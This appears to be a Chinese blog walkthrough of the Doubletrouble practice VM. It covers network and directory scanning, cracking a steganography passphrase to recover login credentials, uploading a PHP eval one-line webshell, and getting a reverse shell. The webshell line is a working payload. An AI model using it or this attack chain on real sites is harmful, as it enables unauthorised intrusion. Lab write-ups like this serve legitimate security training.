当前位置: 首页 > news >正文

Doubletrouble靶机练习

news 2025/8/11 11:51:28

vb打开虚拟机,网络设置为桥接

主机扫描

nmap 192.168.43.1/24

80端口

扫描目录

dirsearch -u http://192.168.43.124

发现文件上传目录

secret目录,有一张图片

下载下来,看看有没有隐写

wget http://192.168.43.124/secret/doubletrouble.jpg

steghide --info doubletrouble.jpg

发现有密码,应该有东西,破解一下试试

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

查看output文件

otisrush@localhost.com
otis666

是邮箱密码,登录

在修改个人信息的地方有文件上传按钮,我们可以尝试上传,看看能不能上传到我们之前找到的文件上传目录

上传木马,发现报错

<?php @eval($_POST[cmd]);?>

但我们确实是上传成功了,连接一下

蚁剑连接成功

反弹shell,开启监听

利用网站生成一个木马  Online - Reverse Shell Generator

重新上传

开启监听后,访问一下1.php文件,就可以反弹shell了

http://www.lryc.cn/news/616238.html

相关文章:

  • 点击速度测试:一款放大操作差距的互动挑战游戏
  • #Datawhale AI夏令营#第三期全球AI攻防挑战赛(AIGC技术-图像方向)
  • 如何用分析方法解决工作中的问题?
  • 检索召回率优化探究五(BGE-M3 混合检索):基于LangChain0.3 集成Milvu2.5 向量数据库构建的智能问答系统
  • Linux系统编程Day11 -- 进程属性和常见进程
  • 学习模板元编程(3)enable_if
  • 【树状数组】Dynamic Range Sum Queries
  • [激光原理与应用-221]:设计 - 皮秒紫外激光器 - 常见技术难题、原因与解决方案
  • Linux-静态配置ip地址
  • 【无标题】命名管道(Named Pipe)是一种在操作系统中用于**进程间通信(IPC)** 的机制
  • 深度解析Linux设备树(DTS):设计原理、实现框架与实例分析
  • 基于Qt/QML 5.14和YOLOv8的工业异常检测Demo:冲压点智能识别
  • 线程池的核心线程数与最大线程数怎么设置
  • 基于FFmpeg的B站视频下载处理
  • 简要介绍交叉编译工具arm-none-eabi、arm-linux-gnueabi与arm-linux-gnueabihf
  • 【iOS】JSONModel源码学习
  • 2025.8.10总结
  • mpv core_thread pipeline
  • 第16届蓝桥杯Scratch选拔赛初级及中级(STEMA)2025年4月13日真题
  • ARM保留的标准中断处理程序入口和外设中断处理程序入口介绍
  • Python设计模式 - 装饰模式
  • 双亲委派机制是什么?
  • 亚麻云之轻云直上EC2
  • 硬件开发_基于STM32单片机的智能电梯系统
  • 关键基础设施中的新兴技术如何扩大网络风险
  • Java .class文件反编译成 .java文件
  • LeetCode 括号生成
  • 机器学习数学基础:46.Mann-Kendall 序贯检验(Sequential MK Test)
  • AtomicStampedReference解决方案
  • QT常用控件三